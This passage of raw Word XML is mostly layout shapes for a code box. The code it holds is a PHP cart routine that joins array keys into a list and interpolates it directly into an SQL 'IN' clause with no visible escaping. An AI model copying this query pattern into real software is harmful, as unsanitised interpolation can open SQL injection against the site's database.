            <v:rect id="_x0000_s7555" style="position:absolute;left:7341;top:6578;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7554" style="position:absolute;left:7461;top:6578;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7553" style="position:absolute" from="1614,6515" to="1614,6841" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7552" style="position:absolute" from="8364,6515" to="8364,6841" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7551" style="position:absolute;left:1617;top:6841;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7550" style="position:absolute;left:1797;top:6904;width:3856;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7549" style="position:absolute;left:5653;top:6904;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7548" style="position:absolute;left:5773;top:6904;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7547" style="position:absolute;left:5894;top:6904;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7546" style="position:absolute;left:6014;top:6904;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7545" style="position:absolute;left:6135;top:6904;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7544" style="position:absolute;left:6255;top:6904;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7543" style="position:absolute;left:6376;top:6904;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7542" style="position:absolute" from="1614,6841" to="1614,7167" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7541" style="position:absolute" from="8364,6841" to="8364,7167" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7540" style="position:absolute;left:1617;top:7167;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7539" style="position:absolute;left:1797;top:7230;width:4097;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7538" style="position:absolute" from="1614,7167" to="1614,7493" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7537" style="position:absolute" from="8364,7167" to="8364,7493" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7536" style="position:absolute;left:1617;top:7493;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7535" style="position:absolute" from="1614,7493" to="1614,7819" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7534" style="position:absolute" from="8364,7493" to="8364,7819" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7533" style="position:absolute;left:1617;top:7819;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7532" style="position:absolute;left:1797;top:7882;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7531" style="position:absolute;left:2713;top:7882;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7530" style="position:absolute;left:3629;top:7882;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7529" style="position:absolute;left:4545;top:7882;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7528" style="position:absolute;left:5461;top:7882;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7527" style="position:absolute;left:6377;top:7882;width:1932;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7526" style="position:absolute;left:8309;top:7882;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7525" style="position:absolute" from="1614,7819" to="1614,8145" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7524" style="position:absolute" from="8364,7819" to="8364,8145" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7523" style="position:absolute;left:1617;top:8145;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7522" style="position:absolute;left:1797;top:8208;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7521" style="position:absolute;left:1917;top:8208;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7520" style="position:absolute;left:2038;top:8208;width:2651;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7519" style="position:absolute;left:4689;top:8208;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7518" style="position:absolute;left:4809;top:8208;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7517" style="position:absolute;left:5773;top:8208;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7516" style="position:absolute;left:5894;top:8208;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7515" style="position:absolute" from="1614,8145" to="1614,8471" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7514" style="position:absolute" from="8364,8145" to="8364,8471" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7513" style="position:absolute;left:1617;top:8471;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7512" style="position:absolute;left:1797;top:8534;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7511" style="position:absolute;left:2713;top:8534;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7510" style="position:absolute;left:3629;top:8534;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7509" style="position:absolute;left:4545;top:8534;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7508" style="position:absolute" from="1614,8471" to="1614,8797" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7507" style="position:absolute" from="8364,8471" to="8364,8797" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7506" style="position:absolute;left:1617;top:8797;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7505" style="position:absolute;left:1797;top:8860;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7504" style="position:absolute;left:2713;top:8860;width:2178;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7503" style="position:absolute" from="4933,8860" to="4933,9060" strokecolor="#f8f8f8" strokeweight="4.15pt"/>
            <v:rect id="_x0000_s7502" style="position:absolute;left:4974;top:8860;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7501" style="position:absolute" from="5137,8860" to="5137,9060" strokecolor="#f8f8f8" strokeweight="4.2pt"/>
            <v:rect id="_x0000_s7500" style="position:absolute;left:5179;top:8860;width:3146;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7499" style="position:absolute;left:8325;top:8860;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7498" style="position:absolute" from="1614,8797" to="1614,9123" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7497" style="position:absolute" from="8364,8797" to="8364,9123" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7496" style="position:absolute;left:1617;top:9123;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7495" style="position:absolute;left:1797;top:9186;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7494" style="position:absolute;left:2761;top:9186;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7493" style="position:absolute;left:2881;top:9186;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7492" style="position:absolute" from="1614,9123" to="1614,9449" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7491" style="position:absolute" from="8364,9123" to="8364,9449" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7490" style="position:absolute;left:1617;top:9449;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7489" style="position:absolute;left:1797;top:9512;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7488" style="position:absolute;left:2713;top:9512;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7487" style="position:absolute;left:3629;top:9512;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7486" style="position:absolute;left:4545;top:9512;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7485" style="position:absolute" from="1614,9449" to="1614,9775" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7484" style="position:absolute" from="8364,9449" to="8364,9775" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7483" style="position:absolute;left:1617;top:9775;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7482" style="position:absolute;left:1797;top:9838;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7481" style="position:absolute;left:2713;top:9838;width:2178;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7480" style="position:absolute" from="4933,9838" to="4933,10038" strokecolor="#f8f8f8" strokeweight="4.15pt"/>
            <v:rect id="_x0000_s7479" style="position:absolute;left:4974;top:9838;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7478" style="position:absolute" from="5137,9838" to="5137,10038" strokecolor="#f8f8f8" strokeweight="4.2pt"/>
            <v:rect id="_x0000_s7477" style="position:absolute;left:5179;top:9838;width:3146;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7476" style="position:absolute;left:8325;top:9838;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7475" style="position:absolute" from="1614,9775" to="1614,10101" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7474" style="position:absolute" from="8364,9775" to="8364,10101" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7473" style="position:absolute;left:1617;top:10101;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7472" style="position:absolute;left:1797;top:10164;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7471" style="position:absolute;left:2761;top:10164;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7470" style="position:absolute;left:2881;top:10164;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7469" style="position:absolute" from="1614,10101" to="1614,10427" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7468" style="position:absolute" from="8364,10101" to="8364,10427" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7467" style="position:absolute;left:1617;top:10427;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7466" style="position:absolute" from="1614,10427" to="1614,10753" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7465" style="position:absolute" from="8364,10427" to="8364,10753" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7464" style="position:absolute;left:1617;top:10753;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7463" style="position:absolute;left:1797;top:10816;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7462" style="position:absolute;left:2713;top:10816;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7461" style="position:absolute;left:3629;top:10816;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7460" style="position:absolute;left:4545;top:10816;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7459" style="position:absolute" from="1614,10753" to="1614,11079" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7458" style="position:absolute" from="8364,10753" to="8364,11079" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7457" style="position:absolute;left:1617;top:11079;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7456" style="position:absolute;left:1797;top:11142;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7455" style="position:absolute;left:2713;top:11142;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7454" style="position:absolute" from="4924,11142" to="4924,11342" strokecolor="#f8f8f8" strokeweight="4.15pt"/>
            <v:rect id="_x0000_s7453" style="position:absolute;left:4965;top:11142;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7452" style="position:absolute" from="5127,11142" to="5127,11342" strokecolor="#f8f8f8" strokeweight="4.2pt"/>
            <v:rect id="_x0000_s7451" style="position:absolute;left:5169;top:11142;width:3013;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7450" style="position:absolute;left:8182;top:11142;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7449" style="position:absolute" from="1614,11079" to="1614,11405" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7448" style="position:absolute" from="8364,11079" to="8364,11405" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7447" style="position:absolute;left:1617;top:11405;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7446" style="position:absolute;left:1797;top:11468;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7445" style="position:absolute;left:2761;top:11468;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7444" style="position:absolute;left:2881;top:11468;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7443" style="position:absolute" from="1614,11405" to="1614,11731" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7442" style="position:absolute" from="8364,11405" to="8364,11731" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7441" style="position:absolute;left:1617;top:11731;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7440" style="position:absolute;left:1797;top:11794;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7439" style="position:absolute;left:2713;top:11794;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7438" style="position:absolute;left:3629;top:11794;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7437" style="position:absolute;left:4545;top:11794;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7436" style="position:absolute" from="1614,11731" to="1614,12057" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7435" style="position:absolute" from="8364,11731" to="8364,12057" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7434" style="position:absolute;left:1617;top:12057;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7433" style="position:absolute;left:1797;top:12120;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7432" style="position:absolute;left:2713;top:12120;width:2048;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7431" style="position:absolute;left:4761;top:12120;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7430" style="position:absolute;left:4882;top:12120;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7429" style="position:absolute;left:5002;top:12120;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7428" style="position:absolute;left:5123;top:12120;width:2771;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7427" style="position:absolute;left:7894;top:12120;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7426" style="position:absolute;left:8015;top:12120;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7425" style="position:absolute;left:8135;top:12120;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7424" style="position:absolute" from="1614,12057" to="1614,12383" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7423" style="position:absolute" from="8364,12057" to="8364,12383" strokecolor="#ccc" strokeweight=".24pt"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="234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7421" type="#_x0000_t202" style="width:339.55pt;height:547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2597" w:right="2323"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$didlist =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3" w:right="72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$this-&gt;fun-&gt;format_array_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>text(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array_keys($didarray), </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>',');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="2931" w:right="72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(!empty($didlist)) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="3845" w:right="72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$db_table = db_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>prefix</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-56"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.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left="183" w:right="72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>document</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>';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3" w:right="72" w:firstLine="3662"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$db_where = "isclass=1 AND</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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color w:val="333333"/>
                    </w:rPr>
                    <w:t>isorder=1</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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</w:rPr>
                    <w:t>AND</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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color w:val="333333"/>
                    </w:rPr>
                    <w:t>did</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-19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in(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$didlist)</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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</w:rPr>
                    <w:t>ORDER</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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</w:rPr>
                    <w:t>BY</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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color w:val="333333"/>
                    </w:rPr>
                    <w:t>did</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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color w:val="333333"/>
                    </w:rPr>
                    <w:t>DESC";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3845" w:right="72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$sql = "SELECT * FROM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72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$db_table WHERE $db_where";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="2909" w:right="1407"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$rs =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72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;db-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>query(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$sql);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3845" w:right="756"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$productmoney = 0; while ($rsList =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3" w:right="72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;db-&gt;fetch_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>assoc(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$rs))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3" w:right="924" w:firstLine="4579"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$amount = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>empty(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$didarray[$rsList['did']]) ? </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>1 :</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> intval($d</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>idarray[$rsList['did']]);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right="96"/>
                    <w:jc w:val="right"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>rsList[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'link']</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="183" w:right="72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>= $this-&gt;get_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>link(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'doc', $rsList, admin_LNG);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7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'buylink'] =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-70"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;get_link('buylink',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72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$rsList, admin_LNG);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7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'enqlink'] =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-70"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;get_link('enqlink',</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="183" w:right="72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$rsList, admin_LNG);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27"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="1097" w:right="72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'dellink'] =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-89"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;get_link('buydel',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72"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$rsList, admin_LNG);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7" w:right="72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'ctitle'] = empty($rsList['color']) ?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7"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s7134" style="position:absolute;margin-left:80.45pt;margin-top:71.85pt;width:338pt;height:547.4pt;z-index:-364840;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1609,1437" coordsize="6760,10948">
            <v:rect id="_x0000_s7420" style="position:absolute;left:1617;top:1440;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7419" style="position:absolute;left:1797;top:1503;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7418" style="position:absolute" from="3761,1503" to="3761,1703" strokecolor="#f8f8f8" strokeweight="3.6pt"/>
            <v:rect id="_x0000_s7417" style="position:absolute;left:3797;top:1503;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7416" style="position:absolute" from="3953,1503" to="3953,1703" strokecolor="#f8f8f8" strokeweight="3.6pt"/>
            <v:rect id="_x0000_s7415" style="position:absolute;left:3989;top:1503;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7414" style="position:absolute" from="4748,1503" to="4748,1703" strokecolor="#f8f8f8" strokeweight="3.6pt"/>
            <v:rect id="_x0000_s7413" style="position:absolute;left:4784;top:1503;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7412" style="position:absolute" from="5784,1503" to="5784,1703" strokecolor="#f8f8f8" strokeweight="3.6pt"/>
            <v:rect id="_x0000_s7411" style="position:absolute;left:5820;top:1503;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
